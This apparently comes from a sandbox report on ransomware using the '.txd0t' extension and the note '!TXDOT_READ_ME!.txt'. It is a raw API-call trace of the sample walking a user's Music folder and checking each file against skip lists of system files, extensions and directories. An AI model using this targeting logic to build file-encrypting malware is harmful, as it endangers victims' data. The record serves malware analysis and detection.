StrCmpIW (psz1="Ph7y_8.m4a", psz2=" ransomware ") returned 1 [0074.891] StrCmpIW (psz1="Ph7y_8.m4a", psz2=" ransom ") returned 1 [0074.891] StrCmpIW (psz1="Ph7y_8.m4a", psz2="debug.txt") returned 1 [0074.891] StrCmpIW (psz1="Ph7y_8.m4a", psz2="boot.ini") returned 1 [0074.891] StrCmpIW (psz1="Ph7y_8.m4a", psz2="desktop.ini") returned 1 [0074.891] StrCmpIW (psz1="Ph7y_8.m4a", psz2="autorun.inf") returned 1 [0074.891] StrCmpIW (psz1="Ph7y_8.m4a", psz2="ntuser.dat") returned 1 [0074.891] StrCmpIW (psz1="Ph7y_8.m4a", psz2="ntldr") returned 1 [0074.891] StrCmpIW (psz1="Ph7y_8.m4a", psz2="ntdetect.com") returned 1 [0074.891] StrCmpIW (psz1="Ph7y_8.m4a", psz2="bootfont.bin") returned 1 [0074.891] StrCmpIW (psz1="Ph7y_8.m4a", psz2="!TXDOT_READ_ME!.txt") returned 1 [0074.891] PathFindExtensionW (pszPath="Ph7y_8.m4a") returned=".m4a" [0074.891] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".m4a") returned 0x0 [0074.891] FileTimeToSystemTime (in: lpFileTime=0x552f19c, lpSystemTime=0x552f188 | out: lpSystemTime=0x552f188) returned 1 [0074.891] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f188, lpLocalTime=0x552f158 | out: lpLocalTime=0x552f158) returned 1 [0074.891] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0074.905] StrCpyW (in: psz1=0xea0078, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0074.905] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\Ph7y_8.m4a", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\Ph7y_8.m4a") returned="\\\\?\\C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\Ph7y_8.m4a" [0074.905] SetEvent (hEvent=0x3fc) returned 1 [0074.906] FindNextFileW (in: hFindFile=0xec21b0, lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb523a730, ftCreationTime.dwHighDateTime=0x1d5e9b6, ftLastAccessTime.dwLowDateTime=0xe6d8b110, ftLastAccessTime.dwHighDateTime=0x1d5e1a2, ftLastWriteTime.dwLowDateTime=0xe6d8b110, ftLastWriteTime.dwHighDateTime=0x1d5e1a2, nFileSizeHigh=0x0, nFileSizeLow=0x7268, dwReserved0=0x741, dwReserved1=0x0, cFileName="Pq-yXja0.m4a", cAlternateFileName="")) returned 1 [0074.906] StrCmpW (psz1="Pq-yXja0.m4a", psz2=".") returned 1 [0074.906] StrCmpW (psz1="Pq-yXja0.m4a", psz2="..") returned 1 [0074.906] StrCpyNW (in: psz1=0xed31f0, psz2="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc", cchMax=1092 | out: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc") returned="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc" [0074.906] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc", psz2="\\", cchMax=1092 | out: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\") returned="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\" [0074.906] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\", psz2="Pq-yXja0.m4a", cchMax=1092 | out: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\Pq-yXja0.m4a") returned="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\Pq-yXja0.m4a" [0074.906] PathFindExtensionW (pszPath="Pq-yXja0.m4a") returned=".m4a" [0074.906] StrCmpW (psz1=".m4a", psz2=".txd0t") returned -1 [0074.906] StrCmpIW (psz1="Pq-yXja0.m4a", psz2="bootsect.bak") returned 1 [0074.906] StrCmpIW (psz1="Pq-yXja0.m4a", psz2="iconcache.db") returned 1 [0074.906] StrCmpIW (psz1="Pq-yXja0.m4a", psz2="thumbs.db") returned -1 [0074.906] StrCmpIW (psz1="Pq-yXja0.m4a", psz2=" ransomware ") returned 1 [0074.906] StrCmpIW (psz1="Pq-yXja0.m4a", psz2=" ransom ") returned 1 [0074.906] StrCmpIW (psz1="Pq-yXja0.m4a", psz2="debug.txt") returned 1 [0074.906] StrCmpIW (psz1="Pq-yXja0.m4a", psz2="boot.ini") returned 1 [0074.906] StrCmpIW (psz1="Pq-yXja0.m4a", psz2="desktop.ini") returned 1 [0074.906] StrCmpIW (psz1="Pq-yXja0.m4a", psz2="autorun.inf") returned 1 [0074.906] StrCmpIW (psz1="Pq-yXja0.m4a", psz2="ntuser.dat") returned 1 [0074.906] StrCmpIW (psz1="Pq-yXja0.m4a", psz2="ntldr") returned 1 [0074.906] StrCmpIW (psz1="Pq-yXja0.m4a", psz2="ntdetect.com") returned 1 [0074.906] StrCmpIW (psz1="Pq-yXja0.m4a", psz2="bootfont.bin") returned 1 [0074.906] StrCmpIW (psz1="Pq-yXja0.m4a", psz2="!TXDOT_READ_ME!.txt") returned 1 [0074.906] PathFindExtensionW (pszPath="Pq-yXja0.m4a") returned=".m4a" [0074.906] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".m4a") returned 0x0 [0074.906] FileTimeToSystemTime (in: lpFileTime=0x552f19c, lpSystemTime=0x552f188 | out: lpSystemTime=0x552f188) returned 1 [0074.906] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f188, lpLocalTime=0x552f158 | out: lpLocalTime=0x552f158) returned 1 [0074.906] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0074.920] StrCpyW (in: psz1=0xea0078, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0074.920] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\Pq-yXja0.m4a", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\Pq-yXja0.m4a") returned="\\\\?\\C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\Pq-yXja0.m4a" [0074.920] SetEvent (hEvent=0x3fc) returned 1 [0074.921] FindNextFileW (in: hFindFile=0xec21b0, lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7f9103d0, ftCreationTime.dwHighDateTime=0x1d5ed7e, ftLastAccessTime.dwLowDateTime=0x51d2c0b0, ftLastAccessTime.dwHighDateTime=0x1d5e98b, ftLastWriteTime.dwLowDateTime=0x51d2c0b0, ftLastWriteTime.dwHighDateTime=0x1d5e98b, nFileSizeHigh=0x0, nFileSizeLow=0x13197, dwReserved0=0x741, dwReserved1=0x0, cFileName="zaYdv7kbUlcUxSz3KeA-.wav", cAlternateFileName="ZAYDV7~1.WAV")) returned 1 [0074.921] StrCmpW (psz1="zaYdv7kbUlcUxSz3KeA-.wav", psz2=".") returned 1 [0074.921] StrCmpW (psz1="zaYdv7kbUlcUxSz3KeA-.wav", psz2="..") returned 1 [0074.921] StrCpyNW (in: psz1=0xed31f0, psz2="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc", cchMax=1092 | out: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc") returned="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc" [0074.921] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc", psz2="\\", cchMax=1092 | out: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\") returned="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\" [0074.921] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\", psz2="zaYdv7kbUlcUxSz3KeA-.wav", cchMax=1092 | out: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\zaYdv7kbUlcUxSz3KeA-.wav") returned="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\zaYdv7kbUlcUxSz3KeA-.wav" [0074.921] PathFindExtensionW (pszPath="zaYdv7kbUlcUxSz3KeA-.wav") returned=".wav" [0074.921] StrCmpW (psz1=".wav", psz2=".txd0t") returned 1 [0074.921] StrCmpIW (psz1="zaYdv7kbUlcUxSz3KeA-.wav", psz2="bootsect.bak") returned 1 [0074.921] StrCmpIW (psz1="zaYdv7kbUlcUxSz3KeA-.wav", psz2="iconcache.db") returned 1 [0074.921] StrCmpIW (psz1="zaYdv7kbUlcUxSz3KeA-.wav", psz2="thumbs.db") returned 1 [0074.921] StrCmpIW (psz1="zaYdv7kbUlcUxSz3KeA-.wav", psz2=" ransomware ") returned 1 [0074.921] StrCmpIW (psz1="zaYdv7kbUlcUxSz3KeA-.wav", psz2=" ransom ") returned 1 [0074.921] StrCmpIW (psz1="zaYdv7kbUlcUxSz3KeA-.wav", psz2="debug.txt") returned 1 [0074.921] StrCmpIW (psz1="zaYdv7kbUlcUxSz3KeA-.wav", psz2="boot.ini") returned 1 [0074.921] StrCmpIW (psz1="zaYdv7kbUlcUxSz3KeA-.wav", psz2="desktop.ini") returned 1 [0074.921] StrCmpIW (psz1="zaYdv7kbUlcUxSz3KeA-.wav", psz2="autorun.inf") returned 1 [0074.921] StrCmpIW (psz1="zaYdv7kbUlcUxSz3KeA-.wav", psz2="ntuser.dat") returned 1 [0074.921] StrCmpIW (psz1="zaYdv7kbUlcUxSz3KeA-.wav", psz2="ntldr") returned 1 [0074.921] StrCmpIW (psz1="zaYdv7kbUlcUxSz3KeA-.wav", psz2="ntdetect.com") returned 1 [0074.921] StrCmpIW (psz1="zaYdv7kbUlcUxSz3KeA-.wav", psz2="bootfont.bin") returned 1 [0074.921] StrCmpIW (psz1="zaYdv7kbUlcUxSz3KeA-.wav", psz2="!TXDOT_READ_ME!.txt") returned 1 [0074.921] PathFindExtensionW (pszPath="zaYdv7kbUlcUxSz3KeA-.wav") returned=".wav" [0074.921] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".wav") returned 0x0 [0074.921] FileTimeToSystemTime (in: lpFileTime=0x552f19c, lpSystemTime=0x552f188 | out: lpSystemTime=0x552f188) returned 1 [0074.921] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f188, lpLocalTime=0x552f158 | out: lpLocalTime=0x552f158) returned 1 [0074.921] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0074.929] StrCpyW (in: psz1=0xea0078, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0074.929] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\zaYdv7kbUlcUxSz3KeA-.wav", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\zaYdv7kbUlcUxSz3KeA-.wav") returned="\\\\?\\C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\zaYdv7kbUlcUxSz3KeA-.wav" [0074.929] SetEvent (hEvent=0x3fc) returned 1 [0074.929] FindNextFileW (in: hFindFile=0xec21b0, lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7f9103d0, ftCreationTime.dwHighDateTime=0x1d5ed7e, ftLastAccessTime.dwLowDateTime=0x51d2c0b0, ftLastAccessTime.dwHighDateTime=0x1d5e98b, ftLastWriteTime.dwLowDateTime=0x51d2c0b0, ftLastWriteTime.dwHighDateTime=0x1d5e98b, nFileSizeHigh=0x0, nFileSizeLow=0x13197, dwReserved0=0x741, dwReserved1=0x0, cFileName="zaYdv7kbUlcUxSz3KeA-.wav", cAlternateFileName="ZAYDV7~1.WAV")) returned 0 [0074.929] FindClose (in: hFindFile=0xec21b0 | out: hFindFile=0xec21b0) returned 1 [0074.929] GetProcessHeap () returned 0xe30000 [0074.929] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed31f0 | out: hHeap=0xe30000) returned 1 [0074.929] FindNextFileW (in: hFindFile=0xec25f0, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd178d9f0, ftCreationTime.dwHighDateTime=0x1d5ea4c, ftLastAccessTime.dwLowDateTime=0xf27b55d0, ftLastAccessTime.dwHighDateTime=0x1d5e0d6, ftLastWriteTime.dwLowDateTime=0xf27b55d0, ftLastWriteTime.dwHighDateTime=0x1d5e0d6, nFileSizeHigh=0x0, nFileSizeLow=0x8ba5, dwReserved0=0xe9f, dwReserved1=0x0, cFileName="fXQDJP18MMdWjvedkW4.mp3", cAlternateFileName="FXQDJP~1.MP3")) returned 1 [0074.929] StrCmpW (psz1="fXQDJP18MMdWjvedkW4.mp3", psz2=".") returned 1 [0074.929] StrCmpW (psz1="fXQDJP18MMdWjvedkW4.mp3", psz2="..") returned 1 [0074.929] StrCpyNW (in: psz1=0xed0058, psz2="C:\\Users\\FD1HVy\\Music", cchMax=1068 | out: psz1="C:\\Users\\FD1HVy\\Music") returned="C:\\Users\\FD1HVy\\Music" [0074.929] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music", psz2="\\", cchMax=1068 | out: psz1="C:\\Users\\FD1HVy\\Music\\") returned="C:\\Users\\FD1HVy\\Music\\" [0074.929] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\", psz2="fXQDJP18MMdWjvedkW4.mp3", cchMax=1068 | out: psz1="C:\\Users\\FD1HVy\\Music\\fXQDJP18MMdWjvedkW4.mp3") returned="C:\\Users\\FD1HVy\\Music\\fXQDJP18MMdWjvedkW4.mp3" [0074.929] PathFindExtensionW (pszPath="fXQDJP18MMdWjvedkW4.mp3") returned=".mp3" [0074.929] StrCmpW (psz1=".mp3", psz2=".txd0t") returned -1 [0074.929] StrCmpIW (psz1="fXQDJP18MMdWjvedkW4.mp3", psz2="bootsect.bak") returned 1 [0074.929] StrCmpIW (psz1="fXQDJP18MMdWjvedkW4.mp3", psz2="iconcache.db") returned -1 [0074.929] StrCmpIW (psz1="fXQDJP18MMdWjvedkW4.mp3", psz2="thumbs.db") returned -1 [0074.929] StrCmpIW (psz1="fXQDJP18MMdWjvedkW4.mp3", psz2=" ransomware ") returned 1 [0074.929] StrCmpIW (psz1="fXQDJP18MMdWjvedkW4.mp3", psz2=" ransom ") returned 1 [0074.930] StrCmpIW (psz1="fXQDJP18MMdWjvedkW4.mp3", psz2="debug.txt") returned 1 [0074.930] StrCmpIW (psz1="fXQDJP18MMdWjvedkW4.mp3", psz2="boot.ini") returned 1 [0074.930] StrCmpIW (psz1="fXQDJP18MMdWjvedkW4.mp3", psz2="desktop.ini") returned 1 [0074.930] StrCmpIW (psz1="fXQDJP18MMdWjvedkW4.mp3", psz2="autorun.inf") returned 1 [0074.930] StrCmpIW (psz1="fXQDJP18MMdWjvedkW4.mp3", psz2="ntuser.dat") returned -1 [0074.930] StrCmpIW (psz1="fXQDJP18MMdWjvedkW4.mp3", psz2="ntldr") returned -1 [0074.930] StrCmpIW (psz1="fXQDJP18MMdWjvedkW4.mp3", psz2="ntdetect.com") returned -1 [0074.930] StrCmpIW (psz1="fXQDJP18MMdWjvedkW4.mp3", psz2="bootfont.bin") returned 1 [0074.930] StrCmpIW (psz1="fXQDJP18MMdWjvedkW4.mp3", psz2="!TXDOT_READ_ME!.txt") returned 1 [0074.930] PathFindExtensionW (pszPath="fXQDJP18MMdWjvedkW4.mp3") returned=".mp3" [0074.930] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".mp3") returned 0x0 [0074.930] FileTimeToSystemTime (in: lpFileTime=0x552f44c, lpSystemTime=0x552f438 | out: lpSystemTime=0x552f438) returned 1 [0074.930] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f438, lpLocalTime=0x552f408 | out: lpLocalTime=0x552f408) returned 1 [0074.930] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0074.940] StrCpyW (in: psz1=0xea0078, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0074.940] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Music\\fXQDJP18MMdWjvedkW4.mp3", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Music\\fXQDJP18MMdWjvedkW4.mp3") returned="\\\\?\\C:\\Users\\FD1HVy\\Music\\fXQDJP18MMdWjvedkW4.mp3" [0074.940] SetEvent (hEvent=0x3fc) returned 1 [0074.940] FindNextFileW (in: hFindFile=0xec25f0, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa0c2db0, ftCreationTime.dwHighDateTime=0x1d5ef72, ftLastAccessTime.dwLowDateTime=0x17604e80, ftLastAccessTime.dwHighDateTime=0x1d5edc7, ftLastWriteTime.dwLowDateTime=0x17604e80, ftLastWriteTime.dwHighDateTime=0x1d5edc7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe9f, dwReserved1=0x0, cFileName="JI_ROcYP5iaMyIhA11bQ", cAlternateFileName="JI_ROC~1")) returned 1 [0074.940] StrCmpW (psz1="JI_ROcYP5iaMyIhA11bQ", psz2=".") returned 1 [0074.940] StrCmpW (psz1="JI_ROcYP5iaMyIhA11bQ", psz2="..") returned 1 [0074.940] StrCpyNW (in: psz1=0xed0058, psz2="C:\\Users\\FD1HVy\\Music", cchMax=1068 | out: psz1="C:\\Users\\FD1HVy\\Music") returned="C:\\Users\\FD1HVy\\Music" [0074.940] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music", psz2="\\", cchMax=1068 | out: psz1="C:\\Users\\FD1HVy\\Music\\") returned="C:\\Users\\FD1HVy\\Music\\" [0074.940] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\", psz2="JI_ROcYP5iaMyIhA11bQ", cchMax=1068 | out: psz1="C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ") returned="C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ" [0074.940] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ", lpSrch="\\windows\\system32\\") returned 0x0 [0074.940] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ", lpSrch="\\windows\\syswow64\\") returned 0x0 [0074.940] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ", lpSrch="\\windows\\system\\") returned 0x0 [0074.940] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ", lpSrch="\\windows\\winsxs\\") returned 0x0 [0074.940] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ", lpSrch="\\appdata\\roaming\\") returned 0x0 [0074.941] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ", lpSrch="\\appdata\\local\\") returned 0x0 [0074.941] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ", lpSrch="\\appdata\\locallow\\") returned 0x0 [0074.941] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ", lpSrch="\\all users\\microsoft\\") returned 0x0 [0074.941] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ", lpSrch="\\inetpub\\logs\\") returned 0x0 [0074.941] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ", lpSrch=":\\boot\\") returned 0x0 [0074.941] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ", lpSrch=":\\perflogs\\") returned 0x0 [0074.941] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ", lpSrch=":\\programdata\\") returned 0x0 [0074.941] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ", lpSrch=":\\drivers\\") returned 0x0 [0074.941] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ", lpSrch=":\\wsus\\") returned 0x0 [0074.941] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ", lpSrch=":\\efstmpwp\\") returned 0x0 [0074.941] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ", lpSrch=":\\$recycle.bin\\") returned 0x0 [0074.941] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ", lpSrch="crypt_detect") returned 0x0 [0074.941] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ", lpSrch="cryptolocker") returned 0x0 [0074.941] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ", lpSrch="ransomware") returned 0x0 [0074.941] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ", lpSrch="C:\\WINDOWS") returned 0x0 [0074.941] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ", lpSrch="C:\\Program Files (x86)") returned 0x0 [0074.941] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ", lpSrch="C:\\Program Files") returned 0x0 [0074.941] GetProcessHeap () returned 0xe30000 [0074.941] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4d6) returned 0xed31f0 [0074.941] StrCpyNW (in: psz1=0xed31f0, psz2="C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ", cchMax=1110 | out: psz1="C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ") returned="C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ" [0074.941] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ", psz2="\\*", cchMax=1110 | out: psz1="C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ\\*") returned="C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ\\*" [0074.941] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ\\*", lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa0c2db0, ftCreationTime.dwHighDateTime=0x1d5ef72, ftLastAccessTime.dwLowDateTime=0x17604e80, ftLastAccessTime.dwHighDateTime=0x1d5edc7, ftLastWriteTime.dwLowDateTime=0x17604e80, ftLastWriteTime.dwHighDateTime=0x1d5edc7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x590ea7, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec22b0 [0074.941] StrCmpW (psz1=".", psz2=".") returned 0 [0074.941] FindNextFileW (in: hFindFile=0xec22b0, lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa0c2db0, ftCreationTime.dwHighDateTime=0x1d5ef72, ftLastAccessTime.dwLowDateTime=0x17604e80, ftLastAccessTime.dwHighDateTime=0x1d5edc7, ftLastWriteTime.dwLowDateTime=0x17604e80, ftLastWriteTime.dwHighDateTime=0x1d5edc7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x590ea7, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0074.941] StrCmpW (psz1="..", psz2=".") returned 1 [0074.941] StrCmpW (psz1="..", psz2="..") returned 0 [0074.941] FindNextFileW (in: hFindFile=0xec22b0, lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x900a9540, ftCreationTime.dwHighDateTime=0x1d5f045, ftLastAccessTime.dwLowDateTime=0x2c28c420, ftLastAccessTime.dwHighDateTime=0x1d5e67c, ftLastWriteTime.dwLowDateTime=0x2c28c420, ftLastWriteTime.dwHighDateTime=0x1d5e67c, nFileSizeHigh=0x0, nFileSizeLow=0x7c45, dwReserved0=0x590ea7, dwReserved1=0x0, cFileName="U7kcA.mp3", cAlternateFileName="")) returned 1 [0074.942] StrCmpW (psz1="U7kcA.mp3", psz2=".") returned 1 [0074.942] StrCmpW (psz1="U7kcA.mp3", psz2="..") returned 1 [0074.942] StrCpyNW (in: psz1=0xed31f0, psz2="C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ", cchMax=1110 | out: psz1="C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ") returned="C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ" [0074.942] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ", psz2="\\", cchMax=1110 | out: psz1="C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ\\") returned="C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ\\" [0074.942] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ\\", psz2="U7kcA.mp3", cchMax=1110 | out: psz1="C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ\\U7kcA.mp3") returned="C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ\\U7kcA.mp3" [0074.942] PathFindExtensionW (pszPath="U7kcA.mp3") returned=".mp3" [0074.942] StrCmpW (psz1=".mp3", psz2=".txd0t") returned -1 [0074.942] StrCmpIW (psz1="U7kcA.mp3", psz2="bootsect.bak") returned 1 [0074.942] StrCmpIW (psz1="U7kcA.mp3", psz2="iconcache.db") returned 1 [0074.942] StrCmpIW (psz1="U7kcA.mp3", psz2="thumbs.db") returned 1 [0074.942] StrCmpIW (psz1="U7kcA.mp3", psz2=" ransomware ") returned 1 [0074.942] StrCmpIW (psz1="U7kcA.mp3", psz2=" ransom ") returned 1 [0074.942] StrCmpIW (psz1="U7kcA.mp3", psz2="debug.txt") returned 1 [0074.942] StrCmpIW (psz1="U7kcA.mp3", psz2="boot.ini") returned 1 [0074.942] StrCmpIW (psz1="U7kcA.mp3", psz2="desktop.ini") returned 1 [0074.942] StrCmpIW (psz1="U7kcA.mp3", psz2="autorun.inf") returned 1 [0074.942] StrCmpIW (psz1="U7kcA.mp3", psz2="ntuser.dat") returned 1 [0074.942] StrCmpIW (psz1="U7kcA.mp3", psz2="ntldr") returned 1 [0074.942] StrCmpIW (psz1="U7kcA.mp3", psz2="ntdetect.com") returned 1 [0074.942] StrCmpIW (psz1="U7kcA.mp3", psz2="bootfont.bin") returned 1 [0074.942] StrCmpIW (psz1="U7kcA.mp3", psz2="!TXDOT_READ_ME!.txt") returned 1 [0074.942] PathFindExtensionW (pszPath="U7kcA.mp3") returned=".mp3" [0074.942] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".mp3") 